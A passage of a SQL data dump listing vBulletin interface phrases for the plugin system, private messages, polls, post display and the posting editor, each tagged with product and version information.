'plugins', 'Installed Products', 'vbulletin', '', 0, ''), (36687, -1, 'installed_version', 'plugins', 'Installed Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36688, -1, 'latest_version', 'plugins', 'Latest Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36689, -1, 'mysql_version', 'plugins', 'MySQL Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36690, -1, 'php_version', 'plugins', 'PHP Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36691, -1, 'plugin_active_desc', 'plugins', 'If this plugin is marked as inactive, it will not be called by vBulletin. Use this to temporarily turn plugins on and off.', 'vbulletin', '', 0, ''), (36692, -1, 'plugin_code_desc', 'plugins', 'Use this field to enter the PHP code that you would like to be run.', 'vbulletin', '', 0, ''), (36693, -1, 'plugin_execution_order', 'plugins', 'Execution Order', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36694, -1, 'plugin_inactive_due_to_product_disabled', 'plugins', 'This plugin is currently inactive due to the product {1} being disabled.', 'vbulletin', '', 0, ''), (36695, -1, 'plugin_is_active', 'plugins', 'Plugin is Active', 'vbulletin', '', 0, ''), (36696, -1, 'plugin_order_desc', 'plugins', 'Use this field to enter the order in which code at the same hook will be executed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36697, -1, 'plugin_php_code', 'plugins', 'Plugin PHP Code', 'vbulletin', '', 0, ''), (36698, -1, 'plugin_products_system', 'plugins', 'Plugin & Products System', 'vbulletin', 'vBulletin Solutions', 1161596475, '3.6.3'), (36699, -1, 'plugin_system', 'plugins', 'Plugin System', 'vbulletin', '', 0, ''), (36700, -1, 'plugin_title_desc', 'plugins', 'Enter a title that describes this plugin.', 'vbulletin', '', 0, ''), (36701, -1, 'plugins_disable_config', 'plugins', 'Warning: Plugins are currently globally disabled via config.php.', 'vbulletin', '', 0, ''), (36702, -1, 'plugins_disabled_options', 'plugins', 'Warning: Plugins are currently globally disabled in your options. In order for plugins and products to function correctly, you must enable the plugin system. Importing a product will do this for you automatically.', 'vbulletin', '', 0, ''), (36703, -1, 'product_id', 'plugins', 'Product ID', 'vbulletin', '', 0, ''), (36704, -1, 'product_incompatible_version_x_mysql', 'plugins', 'This product is not compatible with version {1} of MySQL. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36705, -1, 'product_incompatible_version_x_php', 'plugins', 'This product is not compatible with version {1} of PHP. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36706, -1, 'product_incompatible_version_x_product_y', 'plugins', 'This product is not compatible with version {1} of the product {3}. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36707, -1, 'product_incompatible_version_x_vbulletin', 'plugins', 'This product is not compatible with version {1} of vBulletin. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36708, -1, 'product_url', 'plugins', 'Product URL', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36709, -1, 'product_x_must_be_activated', 'plugins', 'The product {1} must be activated before this product may be installed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36710, -1, 'product_x_must_be_installed', 'plugins', 'The product {1} must be installed before this product may be installed. {2}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36711, -1, 'product_x_out_of_date', 'plugins', 'Product {1} is out of date.', 'vbulletin', 'vBulletin Solutions', 1156849692, '3.6.1'), (36712, -1, 'product_x_up_to_date', 'plugins', 'Product {1} is up to date.', 'vbulletin', 'vBulletin Solutions', 1156849525, '3.6.1'), (36713, -1, 'save_active_status', 'plugins', 'Save Active Status', 'vbulletin', '', 0, ''), (36714, -1, 'save_and_reload', 'plugins', 'Save and Reload', 'vbulletin', 'vBulletin Solutions', 1222260212, '3.8.0 Alpha 2'), (36715, -1, 'uninstall', 'plugins', 'Uninstall', 'vbulletin', '', 0, ''), (36716, -1, 'uninstall_code', 'plugins', 'Uninstall Code', 'vbulletin', '', 0, ''), (36717, -1, 'uninstall_product_break_products_x', 'plugins', 'If you uninstall this product, the following products may no longer function:\r\n
    {1}
', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36718, -1, 'vb_prefix_reserved', 'plugins', 'The product ID prefix vb is reserved for official vBulletin products.
\r\n
\r\nIf you have not received express permission from the vBulletin development team to use the vb prefix, please alter your product ID now.', 'vbulletin', '', 0, ''), (36719, -1, 'vbulletin_version', 'plugins', 'vBulletin Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36720, -1, 'version', 'plugins', 'Version', 'vbulletin', '', 0, ''), (36721, -1, 'version_check_url', 'plugins', 'Version Check URL', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36722, -1, '0_to_9', 'pm', '0 - 9', 'vbulletin', 'vBulletin Solutions', 1214574617, '3.8.0 Alpha 1'), (36723, -1, 'a_to_h', 'pm', 'A - H', 'vbulletin', 'vBulletin Solutions', 1214574685, '3.8.0 Alpha 1'), (36724, -1, 'all_messages', 'pm', 'All Messages', 'vbulletin', 'vBulletin Solutions', 1219756035, '3.8.0 Alpha 1'), (36725, -1, 'bcc', 'pm', 'BCC', 'vbulletin', 'vBulletin Solutions', 1151087521, '3.6.0 Beta 4'), (36726, -1, 'confirm_deletion', 'pm', 'Confirm Deletion', 'vbulletin', '', 0, ''), (36727, -1, 'confirm_outstanding_receipt', 'pm', 'Confirm Outstanding Receipt', 'vbulletin', '', 0, ''), (36728, -1, 'confirmed_private_message_receipts', 'pm', 'Confirmed Private Message Receipts', 'vbulletin', '', 0, ''), (36729, -1, 'csv', 'pm', 'CSV', 'vbulletin', '', 0, ''), (36730, -1, 'delete_items_in_x', 'pm', 'Are you sure you want to permanently delete all items in \'{1}\'?', 'vbulletin', '', 0, ''), (36731, -1, 'delete_message', 'pm', 'Delete Message', 'vbulletin', '', 0, ''), (36732, -1, 'delete_message_click_button', 'pm', 'To delete this message, check the appropriate option below and then click the \'Delete this Message\' button.', 'vbulletin', '', 0, ''), (36733, -1, 'delete_this_message', 'pm', 'Delete this Message', 'vbulletin', '', 0, ''), (36734, -1, 'deselect_all_messages', 'pm', 'Deselect all Messages', 'vbulletin', 'vBulletin Solutions', 1218719909, '3.8.0 Alpha 1'), (36735, -1, 'download_all_private_messages_as', 'pm', 'Download all Private Messages as', 'vbulletin', '', 0, ''), (36736, -1, 'download_as_csv', 'pm', 'Download as CSV', 'vbulletin', '', 0, ''), (36737, -1, 'download_as_text', 'pm', 'Download as TEXT', 'vbulletin', '', 0, ''), (36738, -1, 'download_as_xml', 'pm', 'Download as XML', 'vbulletin', '', 0, ''), (36739, -1, 'dump_from', 'pm', 'From', 'vbulletin', '', 0, ''), (36740, -1, 'dump_privatemessages', 'pm', 'privatemessages', 'vbulletin', '', 0, ''), (36741, -1, 'dump_to', 'pm', 'To', 'vbulletin', '', 0, ''), (36742, -1, 'empty_folder', 'pm', 'Empty Folder', 'vbulletin', '', 0, ''), (36743, -1, 'file_type', 'pm', 'File Type', 'vbulletin', '', 0, ''), (36744, -1, 'filter', 'pm', 'Filter', 'vbulletin', 'vBulletin Solutions', 1221838973, '3.8.0 Alpha 2'), (36745, -1, 'folder_id_x', 'pm', 'Folder id: {1}', 'vbulletin', '', 0, ''), (36746, -1, 'forward_message', 'pm', 'Forward Message', 'vbulletin', '', 0, ''), (36747, -1, 'forward_prefix', 'pm', 'Fw:', 'vbulletin', 'vBulletin Solutions', 1227112183, '3.8.0 Beta 4'), (36748, -1, 'forwarded_message', 'pm', 'Forwarded Message', 'vbulletin', '', 0, ''), (36749, -1, 'i_to_p', 'pm', 'I - P', 'vbulletin', 'vBulletin Solutions', 1214574704, '3.8.0 Alpha 1'), (36750, -1, 'last_month', 'pm', 'Last Month', 'vbulletin', '', 0, ''), (36751, -1, 'last_week', 'pm', 'Last Week', 'vbulletin', '', 0, ''), (36752, -1, 'mark_as_read', 'pm', 'Mark as read', 'vbulletin', '', 0, ''), (36753, -1, 'mark_as_unread', 'pm', 'Mark as unread', 'vbulletin', '', 0, ''), (36754, -1, 'may_send_to_x_people', 'pm', 'You may send your message to up to {1} people at a time.', 'vbulletin', 'vBulletin Solutions', 1154602996, '3.6.0'), (36755, -1, 'message_history', 'pm', 'Message History', 'vbulletin', 'vBulletin Solutions', 1226492034, '3.8.0 Beta 3'), (36756, -1, 'message_tracking', 'pm', 'Message Tracking', 'vbulletin', '', 0, ''), (36757, -1, 'messages_stored_in_folder_x', 'pm', 'Messages stored in this folder: {1}', 'vbulletin', '', 0, ''), (36758, -1, 'move_private_messages', 'pm', 'Move Private Messages', 'vbulletin', '', 0, ''), (36759, -1, 'no_message_history', 'pm', 'This message has no saved history.', 'vbulletin', 'vBulletin Solutions', 1226501042, '3.8.0 Beta 3'), (36760, -1, 'no_messages_to_display', 'pm', 'There are no messages to display. Try a different search.', 'vbulletin', 'vBulletin Solutions', 1214919219, '3.8.0 Alpha 1'), (36761, -1, 'not_replied_to', 'pm', 'Not Replied To', 'vbulletin', 'vBulletin Solutions', 1223907889, '3.8.0 Beta 2'), (36762, -1, 'not_tracking_any_messages', 'pm', 'You are currently not tracking any messages.', 'vbulletin', '', 0, ''), (36763, -1, 'old_messages', 'pm', 'Old Messages', 'vbulletin', 'vBulletin Solutions', 1214576806, '3.8.0 Alpha 1'), (36764, -1, 'other', 'pm', 'Other', 'vbulletin', 'vBulletin Solutions', 1214574742, '3.8.0 Alpha 1'), (36765, -1, 'pm_non_contact_option', 'pm', 'Send message to users even if they are not on your contact list.', 'vbulletin', 'vBulletin Solutions', 1196424297, '3.7.0 Beta 1'), (36766, -1, 'pm_non_contact_option_description', 'pm', 'Your options are currently set to accept private messages only from your contacts. If you send a message to a user not on your contact list, they will not be able to reply to you.', 'vbulletin', 'vBulletin Solutions', 1196433755, '3.7.0 Beta 1'), (36767, -1, 'pm_non_contacts_heading', 'pm', 'Send Message to Non-Contacts', 'vbulletin', 'vBulletin Solutions', 1207317914, '3.7.0 Release Candidate 3'), (36768, -1, 'post_new_private_message', 'pm', 'Send New Private Message', 'vbulletin', '', 0, ''), (36769, -1, 'private_message_dump_for_user_x_y', 'pm', 'Private Message Dump for User {1}; {2}', 'vbulletin', '', 0, ''), (36770, -1, 'private_message_receipt', 'pm', 'Private Message Receipt', 'vbulletin', '', 0, ''), (36771, -1, 'private_messages_in_folder', 'pm', 'Private Messages in Folder', 'vbulletin', '', 0, ''), (36772, -1, 'q_to_z', 'pm', 'Q - Z', 'vbulletin', 'vBulletin Solutions', 1214574719, '3.8.0 Alpha 1'), (36773, -1, 'read', 'pm', 'Read', 'vbulletin', '', 0, ''), (36774, -1, 'read_date', 'pm', 'Read Date', 'vbulletin', '', 0, ''), (36775, -1, 'read_message', 'pm', 'Read Message', 'vbulletin', '', 0, ''), (36776, -1, 'read_messages', 'pm', 'Read Messages', 'vbulletin', 'vBulletin Solutions', 1219756072, '3.8.0 Alpha 1'), (36777, -1, 'recipient_usernames', 'pm', 'Recipient Username(s)', 'vbulletin', '', 0, ''), (36778, -1, 'recipients', 'pm', 'Recipients', 'vbulletin', '', 0, ''), (36779, -1, 'replied_to', 'pm', 'Replied To', 'vbulletin', 'vBulletin Solutions', 1223907872, '3.8.0 Beta 2'), (36780, -1, 'repliedto_message', 'pm', 'Replied-to Message', 'vbulletin', '', 0, ''), (36781, -1, 'reply_to_private_message', 'pm', 'Reply to Private Message', 'vbulletin', '', 0, ''), (36782, -1, 'request_receipt_for_message', 'pm', 'Request a read receipt for this message', 'vbulletin', '', 0, ''), (36783, -1, 'save_copy_in_sent_items_folder', 'pm', 'Save a copy of this message in your Sent Items folder.', 'vbulletin', '', 0, ''), (36784, -1, 'select_deselect_all_in_group', 'pm', 'Select / deselect all in this group', 'vbulletin', 'vBulletin Solutions', 1223906357, '3.8.0 Beta 2'), (36785, -1, 'selected_messages', 'pm', 'Selected Messages', 'vbulletin', '', 0, ''), (36786, -1, 'sender', 'pm', 'Sender', 'vbulletin', 'vBulletin Solutions', 1214568143, '3.8.0 Alpha 1'), (36787, -1, 'sent_date', 'pm', 'Sent Date', 'vbulletin', '', 0, ''), (36788, -1, 'sent_to', 'pm', 'Sent to', 'vbulletin', '', 0, ''), (36789, -1, 'separate_multiple_names', 'pm', 'Separate multiple user names with \';\'', 'vbulletin', '', 0, ''), (36790, -1, 'show_messages', 'pm', 'Show Messages', 'vbulletin', 'vBulletin Solutions', 1214584010, '3.8.0 Alpha 1'), (36791, -1, 'standard_folders', 'pm', 'Standard Folders', 'vbulletin', '', 0, ''), (36792, -1, 'text', 'pm', 'Text', 'vbulletin', '', 0, ''), (36793, -1, 'to_delete_a_folder', 'pm', 'To delete a folder, remove the folder\'s name from the list. All messages stored in this folder will be moved to the Inbox.', 'vbulletin', '', 0, ''), (36794, -1, 'total_messages_in_all_folders_x', 'pm', 'Total messages stored in all folders: {1}', 'vbulletin', '', 0, ''), (36795, -1, 'unconfirmed_private_message_receipts', 'pm', 'Unconfirmed Private Message Receipts', 'vbulletin', '', 0, ''), (36796, -1, 'unread_message', 'pm', 'Unread Message', 'vbulletin', '', 0, ''), (36797, -1, 'unread_messages', 'pm', 'Unread Messages', 'vbulletin', 'vBulletin Solutions', 1219756052, '3.8.0 Alpha 1'), (36798, -1, 'unreadable_data', 'pm', 'Unreadable Data', 'vbulletin', '', 0, ''), (36799, -1, 'view_history', 'pm', 'View History', 'vbulletin', 'vBulletin Solutions', 1226492058, '3.8.0 Beta 3'), (36800, -1, 'view_message', 'pm', 'View Message', 'vbulletin', '', 0, ''), (36801, -1, 'x_contains_y_messages', 'pm', '{2} contains {3} stored messages.', 'vbulletin', '', 0, ''), (36802, -1, 'x_contains_y_z_messages_of_xx', 'pm', '{1} contains {2} messages.
You have {3} messages stored, of a total {4} allowed.', 'vbulletin', '', 0, ''), (36803, -1, 'x_has_requested_a_read_receipt', 'pm', '{1} has requested a read receipt - Confirm?', 'vbulletin', '', 0, ''), (36804, -1, 'x_requested_read_receipt', 'pm', '{1} has requested a read receipt - Confirm? ', 'vbulletin', '', 0, ''), (36805, -1, 'xml', 'pm', 'XML', 'vbulletin', '', 0, ''), (36806, -1, 'you_have_x_and_y_receipts', 'pm', 'You have {1} confirmed and {2} unconfirmed private message receipts.', 'vbulletin', '', 0, ''), (36807, -1, 'your_custom_folders', 'pm', 'Your Custom Folders', 'vbulletin', '', 0, ''), (36808, -1, 'additional_option_1', 'poll', 'Additional Option 1', 'vbulletin', '', 0, ''), (36809, -1, 'additional_option_2', 'poll', 'Additional Option 2', 'vbulletin', '', 0, ''), (36810, -1, 'allow_multiple_choice', 'poll', 'Allow multiple choice: Give users the ability to select more than one answer', 'vbulletin', '', 0, ''), (36811, -1, 'automatically_close_poll_enter_days', 'poll', 'If you would like this poll to automatically close after a period of time, enter a number of days here.
Set this to 0 if you would like the poll to remain open indefinitely.', 'vbulletin', '', 0, ''), (36812, -1, 'close_poll', 'poll', 'Close poll', 'vbulletin', '', 0, ''), (36813, -1, 'closing_poll_impossible_to_vote', 'poll', 'Note: Closing this poll makes it impossible to vote. It however does not stop people from replying to the thread', 'vbulletin', '', 0, ''), (36814, -1, 'days_after_x', 'poll', 'days after {1}', 'vbulletin', '', 0, ''), (36815, -1, 'keep_poll_options_short', 'poll', 'Remember to keep the poll options short and to the point', 'vbulletin', '', 0, ''), (36816, -1, 'make_votes_public', 'poll', 'Make votes public: Displays all users who voted, and what choice they voted for.', 'vbulletin', '', 0, ''), (36817, -1, 'option_x', 'poll', 'Option {1}', 'vbulletin', '', 0, ''), (36818, -1, 'poll_preview', 'poll', 'Poll Preview', 'vbulletin', '', 0, ''), (36819, -1, 'poll_question', 'poll', 'Poll Question', 'vbulletin', '', 0, ''), (36820, -1, 'poll_timeout', 'poll', 'Poll Timeout', 'vbulletin', '', 0, ''), (36821, -1, 'preview_poll', 'poll', 'Preview Poll', 'vbulletin', '', 0, ''), (36822, -1, 'submit_new_poll', 'poll', 'Submit New Poll', 'vbulletin', '', 0, ''), (36823, -1, 'to_close_this_poll_check_this_box', 'poll', 'To close this poll, check this box.', 'vbulletin', '', 0, ''), (36824, -1, 'update_options', 'poll', 'Update options', 'vbulletin', '', 0, ''), (36825, -1, 'add_infraction_for_x', 'postbit', 'Add Infraction for {1}', 'vbulletin', 'vBulletin Solutions', 1149246215, '3.6.0 Beta 1'), (36826, -1, 'add_to_xs_reputation', 'postbit', 'Add to {1}\'s Reputation', 'vbulletin', '', 0, ''), (36827, -1, 'attached_files', 'postbit', 'Attached Files', 'vbulletin', '', 0, ''), (36828, -1, 'attached_images', 'postbit', 'Attached Images', 'vbulletin', '', 0, ''), (36829, -1, 'attached_thumbnails', 'postbit', 'Attached Thumbnails', 'vbulletin', '', 0, ''), (36830, -1, 'attachments_pending_approval', 'postbit', 'Attachments Pending Approval', 'vbulletin', '', 0, ''), (36831, -1, 'edit_delete_message', 'postbit', 'Edit/Delete Message', 'vbulletin', '', 0, ''), (36832, -1, 'file_type_x', 'postbit', 'File Type: {1}', 'vbulletin', '', 0, ''), (36833, -1, 'find_more_posts_by_x', 'postbit', 'Find More Posts by {1}', 'vbulletin', '', 0, ''), (36834, -1, 'forward', 'postbit', 'Forward', 'vbulletin', '', 0, ''), (36835, -1, 'image_larger_version_x_y_z', 'postbit', 'Click image for larger version\r\n\r\nName: {1}\r\nViews: {2}\r\nSize: {3}\r\nID: {4}', 'vbulletin', '', 0, ''), (36836, -1, 'image_x_y_z', 'postbit', 'Name: {1}\r\nViews: {2}\r\nSize: {3}', 'vbulletin', '', 0, ''), (36837, -1, 'ip', 'postbit', 'IP', 'vbulletin', '', 0, ''), (36838, -1, 'last_edited_by_x_on_y_at_z', 'postbit', 'Last edited by {1}; {2} at {3}.', 'vbulletin', 'vBulletin Solutions', 1221263767, '3.8.0 Alpha 1'), (36839, -1, 'last_edited_link_by_x_on_y_at_z_postid', 'postbit', 'Last edited by {1}; {2} at {3}.', 'vbulletin', 'vBulletin Solutions', 1221263709, '3.8.0 Alpha 1'), (36840, -1, 'multi_quote_this_message', 'postbit', 'Multi-Quote This Message', 'vbulletin', 'vBulletin Solutions', 1148659351, '3.6.0 Beta 1'), (36841, -1, 'post_has_been_automoderated', 'postbit', 'Thank you for posting! Your post will not be visible until a moderator has approved it for posting.', 'vbulletin', 'vBulletin Solutions', 1209557813, '3.7.1'), (36842, -1, 'quick_reply_to_this_message', 'postbit', 'Quick reply to this message', 'vbulletin', '', 0, ''), (36843, -1, 'received_infraction', 'postbit', 'Received Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36844, -1, 'received_warning', 'postbit', 'Received Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36845, -1, 'remove_user_from_ignore_list', 'postbit', 'Remove user from ignore list', 'vbulletin', '', 0, ''), (36846, -1, 'reply_with_quote', 'postbit', 'Reply With Quote', 'vbulletin', '', 0, ''), (36847, -1, 'report_bad_post', 'postbit', 'Report Post', 'vbulletin', 'vBulletin Solutions', 1153239738, '3.6.0 Release Candidate 3'), (36848, -1, 'reppower', 'postbit', 'Rep Power', 'vbulletin', '', 0, ''), (36849, -1, 'send_email_to_x', 'postbit', 'Send email to {1}', 'vbulletin', '', 0, ''), (36850, -1, 'view_public_profile', 'postbit', 'View Public Profile', 'vbulletin', '', 0, ''), (36851, -1, 'visit_xs_homepage', 'postbit', 'Visit {1}\'s homepage!', 'vbulletin', '', 0, ''), (36852, -1, 'x_until_y', 'postbit', '{1} until {2}', 'vbulletin', '', 0, ''), (36853, -1, 'x_views', 'postbit', '{1} views', 'vbulletin', '', 0, ''), (36854, -1, 'xs_avatar', 'postbit', '{1}\'s Avatar', 'vbulletin', '', 0, ''), (36855, -1, 'add_edit_files_attached', 'posting', 'Click here to add or edit files attached to this message', 'vbulletin', '', 0, ''), (36856, -1, 'add_tags', 'posting', 'Add Tags', 'vbulletin', 'vBulletin Solutions', 1190903874, '3.7.0 Beta 1'), (36857, -1, 'added_by_x', 'posting', 'Added by {1}', 'vbulletin', 'vBulletin Solutions', 1196431820, '3.7.0 Beta 1'), (36858, -1, 'additional_options', 'posting', 'Additional Options', 'vbulletin', '', 0, ''), (36859, -1, 'align_center', 'posting', 'Align Center', 'vbulletin', '', 0, ''), (36860, -1, 'align_left', 'posting', 'Align Left', 'vbulletin', '', 0, ''), (36861, -1, 'align_right', 'posting', 'Align Right', 'vbulletin', '', 0, ''), (36862, -1, 'attach_files', 'posting', 'Attach Files', 'vbulletin', '', 0, ''), (36863, -1, 'attachment_key', 'posting', 'Attachment Key', 'vbulletin', '', 0, ''), (36864, -1, 'author', 'posting', 'Author', 'vbulletin', 'vBulletin Solutions', 1156883834, '3.6.1'), (36865, -1, 'automatically_parse_links_in_text', 'posting', 'Automatically parse links in text', 'vbulletin', '', 0, ''), (36866, -1, 'average', 'posting', 'Average', 'vbulletin', '', 0, ''), (36867, -1, 'bad', 'posting', 'Bad', 'vbulletin', '', 0, ''), (36868, -1, 'bold', 'posting', 'Bold', 'vbulletin', '', 0, ''), (36869, -1, 'browse', 'posting', 'Browse', 'vbulletin', '', 0, ''), (36870, -1, 'browser_is_safari_no_wysiwyg', 'posting', 'The Safari browser does not support WYSIWYG mode.', 'vbulletin', '', 0, ''), (36871, -1, 'can_add_a_score_for_thread', 'posting', 'If you like, you can add a score for this thread.', 'vbulletin', '', 0, ''), (36872, -1, 'cannot_add_tags_remove_first', 'posting', 'You cannot add any tags to this thread. Please remove some first.', 'vbulletin', 'vBulletin Solutions', 1196431660, '3.7.0 Beta 1'), (36873, -1, 'check_spelling', 'posting', 'Check Spelling', 'vbulletin', '', 0, ''), (36874, -1, 'choose_a_rating', 'posting', 'Choose a rating', 'vbulletin', '', 0, ''), (36875, -1, 'choose_file', 'posting', 'Choose File', 'vbulletin', '', 0, ''), (36876, -1, 'close_this_thread', 'posting', 'Close this thread after you submit your message', 'vbulletin', '', 0, ''), (36877, -1, 'color', 'posting', 'Color', 'vbulletin', '', 0, ''), (36878, -1, 'colors', 'posting', 'Colors', 'vbulletin', '', 0, ''), (36879, -1, 'compare_versions', 'posting', 'Compare Versions', 'vbulletin', 'vBulletin Solutions', 1191498456, '3.7.0 Beta 1'), (36880, -1, 'complete_image_verification', 'posting', 'You did not complete the Image Verification', 'vbulletin', 'vBulletin Solutions', 1144868057, '3.6.0 Beta 1'), (36881, -1, 'copy', 'posting', 'Copy', 'vbulletin', '', 0, ''), (36882, -1, 'cut', 'posting', 'Cut', 'vbulletin', '', 0, ''), (36883, -1, 'decrease_indent', 'posting', 'Decrease Indent', 'vbulletin', '', 0, ''), (36884, -1, 'delete_message', 'posting', 'Delete Message', 'vbulletin', '', 0, ''), (36885, -1, 'delete_message_check_appropriate_option', 'posting', 'To delete this message, check the appropriate option below and then click the \'Delete this Message\' button.', 'vbulletin', '', 0, ''), (36886, -1, 'delete_this_message', 'posting', 'Delete this Message', 'vbulletin', '', 0, ''), (36887, -1, 'deleting_message_deletion_of_thread', 'posting', 'Note: deleting this message will result in the deletion of the entire thread because this is the first post in the thread.', 'vbulletin', '', 0, ''), (36888, -1, 'deletion_options', 'posting', 'Deletion Options', 'vbulletin', '', 0, ''), (36889, -1, 'disable_smilies_in_text', 'posting', 'Disable smilies in text', 'vbulletin', '', 0, ''), (36890, -1, 'do_not_delete_message', 'posting', 'Do Not Delete Message', 'vbulletin', '', 0, ''), (36891, -1, 'do_not_subscribe', 'posting', 'Do not subscribe', 'vbulletin', '', 0, ''), (36892, -1, 'edit_announcement', 'posting', 'Edit Announcement', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (36893, -1, 'edit_tags', 'posting', 'Edit Tags', 'vbulletin', 'vBulletin Solutions', 1190903901, '3.7.0 Beta 1'), (36894, -1, 'enter_email_link', 'posting', 'Please enter the email address for the link:', 'vbulletin', 'vBulletin Solutions', 1156544066, '3.6.1'), (36895, -1, 'enter_image_url', 'posting', 'Please enter the URL of your image:', 'vbulletin', '', 0, ''), (36896, -1, 'enter_link_text', 'posting', 'Enter the text to be displayed for the link (optional):', 'vbulletin', '', 0, ''), (36897, -1, 'enter_link_url', 'posting', 'Please enter the URL of your link:', 'vbulletin', '', 0, ''), (36898, -1, 'enter_list_item', 'posting', 'Enter a list item.\\r\\nLeave the box empty or press \'Cancel\' to complete the list:', 'vbulletin', '', 0, ''), (36899, -1, 'enter_list_type', 'posting', 'What type of list do you want? Enter \'1\' for a numbered list, enter \'a\' for an alphabetical list, or leave blank for a list with bullet points:', 'vbulletin', '', 0, ''), (36900, -1, 'enter_option_x_tag', 'posting', 'Enter the option for the [{1}] tag:', 'vbulletin', '', 0, ''), (36901, -1, 'enter_tag_option', 'posting', 'Please enter the option for your {1} tag:', 'vbulletin', '', 0, ''), (36902, -1, 'enter_text_to_be_formatted', 'posting', 'Enter the text to be formatted', 'vbulletin', '', 0, ''), (36903, -1, 'excellent', 'posting', 'Excellent', 'vbulletin', '', 0, ''), (36904, -1, 'explicit', 'posting', 'Explicit', 'vbulletin', 'vBulletin Solutions', 1156883850, '3.6.1'), (36905, -1, 'filesize_bytes', 'posting', 'Filesize (bytes)', 'vbulletin', 'vBulletin Solutions', 1152639623, '3.6.0 Release Candidate 2'), (36906, -1, 'filetype', 'posting', 'Filetype', 'vbulletin', '', 0, ''), (36907, -1, 'fonts', 'posting', 'Fonts', 'vbulletin', '', 0, ''), (36908, -1, 'go_advanced', 'posting', 'Go Advanced', 'vbulletin', '', 0, ''), (36909, -1, 'good', 'posting', 'Good', 'vbulletin', '', 0, ''), (36910, -1, 'have_uploaded_maximum_x_files', 'posting', 'You have uploaded the maximum of {1} files', 'vbulletin', '', 0, ''), (36911, -1, 'iespell_not_installed', 'posting', 'ieSpell is a spell-checking tool for Internet Explorer.\r\n\r\nIf you would like to download ieSpell, click OK; otherwise click Cancel.\r\n\r\nieSpell can be downloaded from http://www.iespell.com', 'vbulletin', '', 0, ''), (36912, -1, 'increase_indent', 'posting', 'Increase Indent', 'vbulletin', '', 0, ''), (36913, -1, 'indent', 'posting', 'Indent', 'vbulletin', '', 0, ''), (36914, -1, 'insert_all', 'posting', 'Insert All', 'vbulletin', '', 0, ''), (36915, -1, 'insert_email_link', 'posting', 'Insert Email Link', 'vbulletin', '', 0, ''), (36916, -1, 'insert_image', 'posting', 'Insert Image', 'vbulletin', '', 0, ''), (36917, -1, 'insert_link', 'posting', 'Insert Link', 'vbulletin', '', 0, ''), (36918, -1, 'italic', 'posting', 'Italic', 'vbulletin', '', 0, ''), (36919, -1, 'keep_attachments', 'posting', 'Keep Attachments', 'vbulletin', '', 0, ''), (36920, -1, 'keywords', 'posting', 'Keywords', 'vbulletin', 'vBulletin Solutions', 1156883841, '3.6.1'), (36921, -1, 'max_filesize', 'posting', 'Max Filesize', 'vbulletin', '', 0, ''), (36922, -1, 'max_height', 'posting', 'Max Height', 'vbulletin', '', 0, ''), (36923, -1, 'max_width', 'posting', 'Max Width', 'vbulletin', '', 0, ''), (36924, -1, 'maximum', 'posting', 'Maximum', 'vbulletin', '', 0, ''), (36925, -1, 'message_by_x_on_y_at_z', 'posting', 'Message originally posted by {2} on {3} at {4}', 'vbulletin', '', 0, ''), (36926, -1, 'message_too_short', 'posting', 'The message you have entered is too short. Please lengthen your message to at least {1} characters.', 'vbulletin', 'vBulletin Solutions', 1156544084, '3.6.1'), (36927, -1, 'more', 'posting', 'More', 'vbulletin', '', 0, ''), (36928, -1, 'moz_edit_config_file', 'posting', 'You need to edit your Mozilla config file to allow this action.', 'vbulletin', '', 0, ''), (36929, -1, 'moz_must_select_text', 'posting', 'Mozilla requires that you must select some text for this function to work', 'vbulletin', '', 0, ''), (36930, -1, 'must_enter_subject', 'posting', 'You must enter a title / subject!', 'vbulletin', '', 0, ''), (36931, -1, 'must_select_text_to_use', 'posting', 'You must select some text to use this function.', 'vbulletin', '', 0, ''), (36932, -1, 'must_select_two_version_comparison', 'posting', 'You must select two different versions to make a valid comparison.', 'vbulletin', 'vBulletin Solutions', 1191498292, '3.7.0 Beta 1'), (36933, -1, 'number_of_poll_options', 'posting', 'Number of poll options', 'vbulletin', '', 0, ''), (36934, -1, 'ordered_list', 'posting', 'Ordered List', 'vbulletin', '', 0, ''), (36935, -1, 'original_post', 'posting', 'Original Post', 'vbulletin', 'vBulletin Solutions', 1191498155, '3.7.0 Beta 1'), (36936, -1, 'paste', 'posting', 'Paste', 'vbulletin', '', 0, ''), (36937, -1, 'physically_remove_message', 'posting', 'Physically Remove Message', 'vbulletin', '', 0, ''), (36938, -1, 'podcast_options', 'posting', 'Podcast Options', 'vbulletin', 'vBulletin Solutions', 1156887056, '3.6.1'), (36939, -1, 'podcast_url', 'posting', 'Podcast URL', 'vbulletin', 'vBulletin Solutions', 1152636834, '3.6.0 Release Candidate 2'), (36940, -1, 'post_a_poll', 'posting', 'Post a Poll', 'vbulletin', '', 0, ''), (36941, -1, 'post_comparison', 'posting', 'Post Comparison', 'vbulletin', 'vBulletin Solutions', 1194539201, '3.7.0 Beta 1'), (36942, -1, 'post_edit_history', 'posting', 'Post Edit History', 'vbulletin', 'vBulletin Solutions', 1191498206, '3.7.0 Beta 1'), (36943, -1, 'post_new_announcement', 'posting', 'Post New Announcement', 'vbulletin', 'vBulletin Solutions', 1142641239, '3.6.0 Beta 1'), (36944, -1, 'post_new_thread', 'posting', 'Post New Thread', 'vbulletin', '', 0, 